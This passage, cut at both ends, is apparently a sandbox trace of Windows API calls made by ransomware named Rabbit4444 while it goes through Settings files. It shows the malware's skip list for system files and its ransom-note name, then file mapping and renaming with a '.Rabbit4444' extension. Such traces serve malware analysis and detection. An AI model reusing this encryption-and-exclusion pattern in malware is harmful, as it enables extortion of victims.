dwFileAttributes=0x0) returned 1 [0057.820] lstrlenW (lpString="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms") returned 76 [0057.820] lstrlenW (lpString="Rabbit4444") returned 10 [0057.820] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.820] lstrlenW (lpString=".dll") returned 4 [0057.820] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.820] lstrlenW (lpString=".lnk") returned 4 [0057.820] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.820] lstrlenW (lpString=".ini") returned 4 [0057.820] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.820] lstrlenW (lpString=".sys") returned 4 [0057.820] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.820] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_background_choosebackground.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.821] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.821] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14913145597) returned 1 [0057.821] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1330) returned 1 [0057.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0057.821] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x840, lpName=0x0) returned 0x298 [0057.822] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x840) returned 0x70000 [0057.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0057.823] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0057.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.823] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14913402555) returned 1 [0057.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.823] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0057.823] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.823] CloseHandle (hObject=0x298) returned 1 [0057.824] CloseHandle (hObject=0x278) returned 1 [0057.824] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms.Rabbit4444") returned 204 [0057.824] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_background_choosebackground.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_background_choosebackground.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.824] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32d4e636, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32d4e636, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x50f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", cAlternateFileName="AA99F9~1.SET")) returned 1 [0057.824] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.824] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.824] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.824] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2=".") returned 1 [0057.824] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="..") returned 1 [0057.825] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="windows") returned -1 [0057.825] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.825] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.825] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="boot") returned -1 [0057.825] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.825] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.825] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms") returned="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms" [0057.825] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.825] lstrlenW (lpString="AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms") returned 69 [0057.825] lstrlenW (lpString="Rabbit4444") returned 10 [0057.825] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.825] lstrlenW (lpString=".dll") returned 4 [0057.825] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.825] lstrlenW (lpString=".lnk") returned 4 [0057.825] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.825] lstrlenW (lpString=".ini") returned 4 [0057.825] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.825] lstrlenW (lpString=".sys") returned 4 [0057.825] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.825] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_background_choosefit.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.826] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.826] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14913646138) returned 1 [0057.826] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1295) returned 1 [0057.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0057.826] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0057.826] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x810, lpName=0x0) returned 0x298 [0057.828] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x810) returned 0x70000 [0057.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0057.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0057.829] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14913993350) returned 1 [0057.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0057.829] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0057.829] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.830] CloseHandle (hObject=0x298) returned 1 [0057.830] CloseHandle (hObject=0x278) returned 1 [0057.830] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms.Rabbit4444") returned 197 [0057.830] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_background_choosefit.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseFit.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_background_choosefit.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.830] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334292ce, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x334292ce, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x512, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", cAlternateFileName="AA5480~1.SET")) returned 1 [0057.830] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.830] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2=".") returned 1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="..") returned 1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="windows") returned -1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="boot") returned -1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.831] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.831] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms") returned="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms" [0057.831] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.831] lstrlenW (lpString="AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms") returned 70 [0057.831] lstrlenW (lpString="Rabbit4444") returned 10 [0057.831] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.831] lstrlenW (lpString=".dll") returned 4 [0057.831] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.831] lstrlenW (lpString=".lnk") returned 4 [0057.831] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.831] lstrlenW (lpString=".ini") returned 4 [0057.831] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.831] lstrlenW (lpString=".sys") returned 4 [0057.831] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.831] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_color_colorprevalence.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.832] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.832] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14914240905) returned 1 [0057.832] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1298) returned 1 [0057.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0057.832] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.833] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.834] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.834] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.835] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14914546344) returned 1 [0057.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.835] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0057.835] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.835] CloseHandle (hObject=0x298) returned 1 [0057.835] CloseHandle (hObject=0x278) returned 1 [0057.835] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms.Rabbit4444") returned 198 [0057.835] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_color_colorprevalence.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_ColorPrevalence.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_color_colorprevalence.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.839] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33808fb0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x33808fb0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23a74c5a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", cAlternateFileName="AA13E8~1.SET")) returned 1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2=".") returned 1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="..") returned 1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="windows") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="boot") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.839] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.839] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms") returned="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms" [0057.839] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.840] lstrlenW (lpString="AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms") returned 73 [0057.840] lstrlenW (lpString="Rabbit4444") returned 10 [0057.840] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.840] lstrlenW (lpString=".dll") returned 4 [0057.840] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.840] lstrlenW (lpString=".lnk") returned 4 [0057.840] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.840] lstrlenW (lpString=".ini") returned 4 [0057.840] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.840] lstrlenW (lpString=".sys") returned 4 [0057.840] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.840] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_color_enabletransparency.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.840] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.840] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14915106976) returned 1 [0057.840] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1313) returned 1 [0057.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.840] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0057.840] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x830, lpName=0x0) returned 0x298 [0057.842] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x830) returned 0x70000 [0057.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.843] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.843] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.844] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14915455389) returned 1 [0057.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.844] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0057.844] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.844] CloseHandle (hObject=0x298) returned 1 [0057.844] CloseHandle (hObject=0x278) returned 1 [0057.844] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms.Rabbit4444") returned 201 [0057.844] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Color_EnableTransparency.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_personalize_color_enabletransparency.settingcontent-ms"), 